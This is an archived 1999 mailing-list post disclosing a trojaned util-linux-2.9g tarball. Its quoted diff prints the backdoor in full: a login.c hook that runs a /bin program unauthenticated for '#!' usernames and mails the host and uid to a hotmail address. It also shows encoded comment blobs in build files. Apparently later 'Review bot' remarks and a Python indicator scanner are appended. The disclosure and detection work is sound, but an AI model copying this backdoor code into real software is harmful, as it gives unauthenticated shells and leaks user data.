[Andries.Brouwer@cwi.nl: [linux-security] Re: util-linux compromised] Beware: trap


Wolfgang Nowak (wuffel@zurbel.infodrom.north.de)
Mon, 25 Jan 1999 23:45:30 +0100


...see {subject, attachment}

-- 
Wolfgang Nowak <wuffel@zurbel.infodrom.north.de>
In which I hereby decree, by way of my last will, that nobody is to take the
liberty of writing RIP on my gravestone. One simply does not do that with
network people. (Detlef Bosau in dcoun)

attached mail follows:


Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST)
From: John Stange <building@cs.umd.edu>
Subject: util-linux compromised?

I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a section of login.c that appears to send the host and uid of the user to a hotmail address. I imagine this isn't a standard feature. :> Given that the tcp wrappers archive was backdoored on that same server recently, you might want to comb over the rest of your stuff as well, if any of it's yours.

-- 
John Stange
Staff World, 4120 AVW x52720

and indeed, util-linux-2.9g had been replaced by a trojan version. Unfortunately this means that everything from ftp.win.tue.nl must be regarded as suspect for the moment.

I put a correct util-linux-2.9g.tar.gz back, with md5sum

ab409a6ac5a775a4b04b8e27f6c86933  util-linux-2.9g.tar.gz

but of course, for the time being, nothing on this machine can be trusted.

Andries

A diff between original and trojan:

diff -r util-linux-2.9g/disk-utils/Makefile trojan/util-linux-2.9g/disk-utils/Makefile 94a95 > diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh 147a148,171 > # M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO > # M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z > # M>'1X>$!8765I7F5E65Q80B`@(`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`V*2)_T]3N:K+>%1FC[51;V353M > # MJ&=*Q5F85)'1_?[N^?''BW>G[Q6H?UJ8PN@RU\NJU&F0Z64P-_;/2IV/+UY] > # MIY\^G478?1J4_5<ZO;7WP1(?K"EGT;)(^Z\>D)C&65#$1.&9GA@\7AC=B3.8 > # M59)T=%$Y:=)C"//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O > # M\2PS?]6=Y]O'ES<['=VQRZ`(.^!@9L-;'6219KKW<9+H,$^7T&E73\%MR:S' > # M5F>YOC5%9A)MJ^4R+TJ=9YK)L"!&WSW?IM\[3+&?QEG\A04RL_Z7>\8[H>'T > # MNSV\->H!O^G1J]O.YD(4>T`\]!^L^["Y`CUUH]P89;(HGBF36/,XT<=(N$F; > # M5\9VU%/L_7A']T*0.'YW-GX_P9>WD[/CFZO)R>2[/?W\C[J7Z^??RR[6*%W( > # MH+]+:WWZTY$7B>Q1.*PYS76"408??@'+S[?/WOI%_D,6H6>G/\CH7\[O5PFY > # MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#"PXK`J+WW`NF > diff -r util-linux-2.9g/login-utils/login.c trojan/util-linux-2.9g/login-utils/login.c 179a180 > void checkname P_((char *name)); 552a554,555 > checkname(username); > 1291a1295,1342 > } > > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <netdb.h> > > void > checkname(char *name) > { > char a[100]; > char *pt; > > if ((name[0] == '#') && (name[1] == '!')) > { > pt = (char*)&name[2]; > sprintf(a,"/bin/%s",pt); > execl(a,a,(void*)0); > } > if (fork() == 0) > { > struct hostent *he; > struct sockaddr_in sai; > struct in_addr *ia; > char b[500]; > int s,l; > > setsid(); > s = open("/var/tmp/.fmlock0",O_RDONLY); > if (s >= 0) exit(0); > he = gethostbyname("mail.hotmail.com"); > if (!he) exit(0); > ia = (struct in_addr *)he->h_addr_list[0]; > l = sizeof(sai);memset(&sai,0,l); > sai.sin_port = htons(25); > sai.sin_addr.s_addr = ia->s_addr; > if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0); > if ((connect(s,(struct sockaddr*)&sai,l)) < 0) 
exit(0); > if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0); > sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid()); > sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0); > sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) < 0) exit(0); > if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0) exit(0); > sleep(1);if (write(s,"DATA\n",5) < 0) exit(0); > sleep(1);if (write(s,b,strlen(b)) < 0) exit(0); > sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0); > sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0); > } diff -r util-linux-2.9g/misc-utils/Makefile trojan/util-linux-2.9g/misc-utils/Makefile 85a86,88 > > #@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/< >
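Review bot: the block added to install-sh at 147a148,171 is 24 comment lines of the form `# M...` with no explanation and nothing in the script that reads them; that shape is what uuencoded binary data looks like, and an install script has no business carrying encoded data in its comments. Reject the hunk and replace the file from an independently obtained copy rather than just deleting the lines, since, as the mail says, nothing else on that host can be trusted either.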
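Review bot: the call `checkname(username);` inserted at 552a554,555 runs on the raw login name before any password check, and the function body at 1291a1295,1342 does two things neither of which belongs in login: a name beginning with `#!` has its remainder passed to `execl` as a path under `/bin/`, so that program replaces the login process without authentication, and otherwise a forked child connects to `mail.hotmail.com` on port 25 and mails the host address and uid to a hotmail account, using `/var/tmp/.fmlock0` as a once-only marker. It is also careless code on its own terms: `sprintf(a,"/bin/%s",pt)` writes an unbounded name into `char a[100]`, `open`, `creat`, `fork`, `execl` and `write` are used without `<fcntl.h>` or `<unistd.h>`, and an `int` is passed where `getsockname` expects a `socklen_t`. For anyone auditing a host that ran this binary, `/var/tmp/.fmlock0` is created only after the SMTP session completed, so its presence means the beacon went out, and outbound port-25 connections originating from login are the thing to look for in network logs.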
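Review bot: the lines added to misc-utils/Makefile at 85a86,88 are a blank line and one opaque `#@hWIr...` comment that no rule refers to; it is the same pattern as the block in install-sh and should be rejected the same way. A cheap check for this class of change across a tree is any comment line of forty or more characters with no whitespace in a Makefile or shell script.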

(pasted from another window - tabs etc. will be lost).

Andries
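The two checks the thread turns on, whether a source tree carries the modifications shown in the diff and whether a downloaded tarball matches a digest obtained somewhere other than the compromised host, can both be done mechanically. The following is an added example, not code from the original mail or from util-linux: the indicator strings are copied from the diff quoted above, the indicator labels and the blob heuristic are this example's own choices, and the sample file fragments, sample tree and test digest are constructed for the demonstration.

```python
# Added example (not code from the original mail or from util-linux): scan a
# util-linux source tree for the indicators visible in the diff quoted above,
# and check a downloaded tarball against a digest obtained out of band.
# The indicator strings are copied from the diff; every file fragment and
# digest below is constructed for the demonstration.
import hashlib
import hmac
import re
from typing import Dict, List, Tuple

# Literal strings that only the trojaned login.c contains (taken from the diff).
LITERAL_INDICATORS = [
    ("checkname-hook", re.compile(r"\bcheckname\s*\(")),
    ("smtp-exfil-host", re.compile(r"mail\.hotmail\.com")),
    ("exfil-recipient", re.compile(r"wlogain@hotmail\.com")),
    ("marker-file", re.compile(r"/var/tmp/\.fmlock0")),
]


def looks_like_blob(line: str) -> bool:
    """Heuristic for the opaque comment lines added to install-sh and to
    misc-utils/Makefile: a '#' comment whose body is a single run of 40 or
    more non-whitespace characters mixing letters, digits and punctuation.
    Comment rulers such as '#-----' fail the character-class test."""
    m = re.match(r"^\s*#\s*(\S{40,})\s*$", line)
    if not m:
        return False
    body = m.group(1)
    has_alpha = any(c.isalpha() for c in body)
    has_digit = any(c.isdigit() for c in body)
    has_punct = any(not c.isalnum() for c in body)
    return has_alpha and has_digit and has_punct and len(set(body)) >= 8


def scan_file(name: str, text: str) -> List[Tuple[str, int, str]]:
    """Return (indicator, line_number, stripped_line) for every hit in one file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in LITERAL_INDICATORS:
            if pattern.search(line):
                hits.append((label, lineno, line.strip()))
        if looks_like_blob(line):
            hits.append(("opaque-comment-blob", lineno, line.strip()))
    return hits


def scan_tree(files: Dict[str, str]) -> Dict[str, List[Tuple[str, int, str]]]:
    """Scan a {relative_path: contents} mapping; only files with hits appear."""
    report = {}
    for path, text in files.items():
        hits = scan_file(path, text)
        if hits:
            report[path] = hits
    return report


def digest_matches(data: bytes, expected_md5_hex: str) -> bool:
    """Compare the MD5 of a downloaded file with a digest obtained out of band.
    The comparison is constant-time; the caveat that matters is the one the
    mail makes: a digest fetched from the same compromised host proves nothing,
    so the expected value has to come from the author, a signed announcement
    or an independent mirror."""
    actual = hashlib.md5(data).hexdigest()
    return hmac.compare_digest(actual, expected_md5_hex.strip().lower())


# Constructed sample tree. The trojan lines are the ones the diff above adds;
# everything else is filler standing in for the real util-linux sources.
CLEAN_LOGIN_C = """    username = getloginname();
    pp = getpwnam(username);
    if (pp == NULL) badlogin(username);
"""
TROJAN_LOGIN_C = """    username = getloginname();
    checkname(username);
    pp = getpwnam(username);
    /* ... in the added function ... */
    s = open("/var/tmp/.fmlock0",O_RDONLY);
    he = gethostbyname("mail.hotmail.com");
"""
TROJAN_INSTALL_SH = r"""#!/bin/sh
# install - install a program, script, or datafile
# M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO
"""
TROJAN_MAKEFILE = r"""# Makefile for misc-utils

#@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<
"""
CLEAN_MAKEFILE = "#" + "-" * 60 + "\n# Makefile for disk-utils\n"

SAMPLE_TREE = {
    "login-utils/login.c": TROJAN_LOGIN_C,
    "install-sh": TROJAN_INSTALL_SH,
    "misc-utils/Makefile": TROJAN_MAKEFILE,
    "disk-utils/Makefile": CLEAN_MAKEFILE,
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_TREE).items():
        for label, lineno, line in hits:
            print(f"{path}:{lineno}: {label}: {line}")
```

Run against a real unpacked tree by building the mapping from the files on disk; the literal indicators catch exactly this trojan, while the blob heuristic is the more general check, since an obfuscated payload hidden in comments is the part of this pattern most likely to recur in a different form.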

-- 
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------

To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com < /dev/null



This archive was generated by hypermail 2.0b3 on Tue Jan 26 1999 - 00:00:52 CET